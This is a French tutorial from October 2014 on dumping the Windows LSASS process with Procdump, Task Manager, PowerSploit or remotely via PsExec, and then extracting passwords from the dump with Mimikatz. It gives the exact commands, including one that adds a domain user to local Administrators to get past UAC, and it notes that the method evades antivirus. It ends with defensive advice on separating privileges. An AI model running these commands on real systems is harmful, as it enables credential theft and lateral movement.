Vous êtes sur la page 1sur 9

Mimikatz (2/4) : extraction de

mots de passe partir dun


dump du processus LSASS

(v1.45)

Tutorial conu et rdig par Michel de CREVOISIER octobre 2014

ARTICLES ASSOCIES

1. Mimikatz : prsentation, fonctionnement, contre-mesures et processus LSASS (lien)


2. Mimikatz : extraction de mots de passe partir dun dump du processus LSASS (lien)
3. Mimikatz : rcupration de mots de passe via Metasploit et Meterpreter (lien)
4. Mimikatz : matrice de tests de fonctionnement en environnement Windows (lien)

Prambule
Dans un article prcdent nous prsentions le fonctionnement du logiciel Mimikatz dvelopp par
Benjamin DELPY. Nous avons ainsi pu constater que son module sekurlsa permettait la
rcupration de mots de passe contenus dans le processus LSASS de Windows.
A la suite, nous allons prsenter un autre module de Mimikatz permettant lextraction de mots de
passe partir dun dump . Pour information, un dump constitue une extraction mmoire dun
processus donn. Dans notre cas, lobjectif sera de raliser un dump du processus LSASS afin
dextraire et danalyser son contenu via le module minidump (source). Cette technique a pour
avantage de ne dclencher aucune action dtectable par les antivirus. De ce fait, son utilisation
prsente un intrt majeur lors de la ralisation dun dump sur une machine distante.

INDEX
1.

2.

Dump du processus LSASS .......................................................................................................................... 3


1.1

En local................................................................................................................................................. 3

1.2

A distance ............................................................................................................................................ 6

Extraction des mots de passe via Mimikatz ............................................................................................... 8

Conclusion ........................................................................................................................................................... 9

1. Dump du processus LSASS


Pour information, lensemble des actions ont t ralises depuis un poste sous Windows 7 x64 (sauf
pour le point 1.1.3 ralis sous Windows 8.1.1 x64) en utilisant un compte local membre du groupe
Administrateurs de la machine cible.

IMPORTANT
Lobtention du privilge system par un attaquant permet doutrepasser un certain nombre de
mcanismes de scurit prsents sous Windows, dont la suppression du privilge debug (lien).

1.1 En local
1.1.1 Via Procdump
Pour raliser un dump en local du processus LSASS via le logiciel Procdump :
1. Tlchargez Procdump ici
2. Ouvrez une console DOS en tant quadministrateur sur le poste concern
3. Excutez lapplication avec les paramtres suivants :
C:\procdump.exe -accepteula -ma lsass.exe C:\%COMPUTERNAME%_lsass.dmp 2>&1

Remarque : si vous ne disposez pas des droits ncessaires, si la console na pas t ouverte en tant
quadministrateur ou si le privilge debug a t supprim, lerreur suivante apparatra :

Pour rcuprer les mots de passe contenus dans le dump, dirigez-vous au point 2.

1.1.2 Via le gestionnaire des tches Windows


Pour raliser un dump en local du processus LSASS partir du gestionnaire des tches :
1. Ouvrez le gestionnaire des tches et dirigez-vous dans longlet Processus. Si lUAC est activ,
cliquez sur Affichez les processus de tous les utilisateurs en bas gauche
3

2. Faites un clic droit sur le processus LSASS > Crer un fichier de vidage

3. Si lopration sest bien droule, le message suivant apparatra :

Remarque : si vous ne disposez pas des droits ncessaires ou si le privilge debug a t supprim,
lerreur suivante apparatra :

Pour rcuprer les mots de passe contenus dans le dump, dirigez-vous au point 2.
4

1.1.3 En PowerShell
Il est galement possible de raliser un dump partir du module PowerSploit crit en PowerShell. Ce
dernier ncessite toutefois PowerShell v3 disponible depuis Windows 8 et Windows Server 2012.
1. Tlchargez le module PowerSploit ici
2. Copiez le dossier entier dans le rpertoire de modules PowerShell :
%windir%\System32\WindowsPowerShell\v1.0\Modules
3. Importez le module
Import-Module PowerSploit
4. Vrifiez la bonne importation du module et ses diffrentes commandes :
Get-Command -Module PowerSploit

5. Excutez la commande suivante pour gnrer le dump :


Get-Process lsass | Out-Minidump -DumpFilePath C:\temp
Remarque : si vous ne disposez pas des droits ncessaires, si la console na pas t ouverte en tant
quadministrateur ou si le privilge debug a t supprim, lerreur suivante apparatra :

1.2 A distance

IMPORTANT

LUAC empche lutilisation du logiciel PSexec uniquement sil est utilis avec un compte
local membre du groupe Administrateurs de la machine cible. Sil est utilis avec un
compte du domaine plac dans le groupe Administrateurs de la machine cible, alors lUAC
sera outrepass et PSexec excut
PSexec ncessite obligatoirement lactivation du partage de fichier en entre au niveau du
pare-feu pour fonctionner (SMB - 445)

Pour raliser un dump distance, il est ncessaire de disposer dun accs distant une machine.
Cette action implique de connatre son IP ou son nom DNS et de respecter la procdure suivante :
1. Tlchargez les outils suivants dans le mme dossier :
o PSexec (lien)
o Procdump (lien)
2. Rcuprez les identifiants dun utilisateur du domaine ou dun compte local. Passez
directement ltape 4 si:
o Lutilisateur du domaine est dj membre du groupe Administrateurs de la
machine cibles OU
o Le compte local est membre du groupe Administrateurs de la machine cible et
lUAC est dsactiv
3. Placez lutilisateur du domaine dans le groupe Administrateurs de la machine cible afin
doutrepasser lUAC : net localgroup <Administrator group> /add <domain\user>
o Remarque : on conviendra que la difficult de cette tape rside excuter cette
commande sans PSexec (puisquil est actuellement bloqu par lUAC) sur la machine
cible afin de passer ltape suivante
4. Excutez la commande ci-dessous en prenant soin dutiliser loption [-s] afin dexcuter
lapplication Procdump en tant que system :
PsExec.exe /accepteula \\<IP> u <domaine\user> p <password> -s -c procdump.exe -accepteula ma lsass.exe C:\%COMPUTERNAME%_lsass.dmp 2>&1

5. Rcuprez ensuite le dump gnr en utilisant (par exemple) un partage administratif (\\C$)

Remarque : si lUAC est activ et si vous utilisez un compte local membre du groupe
Administrateurs , une erreur apparatra. De la mme faon, lerreur la fin du point 1.1.1
apparatra si le privilge debug a t supprim.
Pour analyser et rcuprer les mots de passe contenus dans le dump, dirigez-vous au point 2.

2. Extraction des mots de passe via Mimikatz


A ce stade vous devez avoir rcupr un dump du processus LSASS sur votre poste de travail. Nous
allons maintenant extraire les mots de passe contenus dans ce fichier laide du module Minidump
de Mimikatz. Prenez soin de bien respecter la matrice ci-dessous pour raliser lextraction (source) :

Ouvrez ensuite le logiciel Mimikatz et excutez les commandes suivantes pour extraite les mots de
passe contenus dans le dump :
sekurlsa::minidump <fichier dump *.dmp>
sekurlsa::logonPasswords

Conclusion
La ralisation dun dump du processus LSASS constitue donc un vecteur dentre potentiel pour
les hackers afin de drober les mots de passe en mmoire. Et si les moyens de protection prsents
au sein de Windows constituent un premier niveau de scurit, il reste quils seront rapidement
outrepasss si une politique de privilge fine nest pas applique au sein de lorganisation.
En dfinitive, lUAC reprsente un moyen de protection efficace uniquement si lutilisateur courant
ne dispose pas de privilges dadministration sur son poste de travail. Dans ce sens, lutilisation dun
compte de domaine sans privilges dadministration et dun second compte de domaine avec des
privilges dadministration constitue un choix judicieux pour lutter contre ce type de menace. Veillez
toutefois restreindre louverture de sessions interactives avec le compte privilge afin que les
identifiants ne soient pas stocks dans le LSA cache (source).

Nhsitez pas menvoyer vos commentaires ou retours ladresse suivante :


m.decrevoisier A-R-0-B-A-5 outlook . com

Soyez-en dores et dj remerci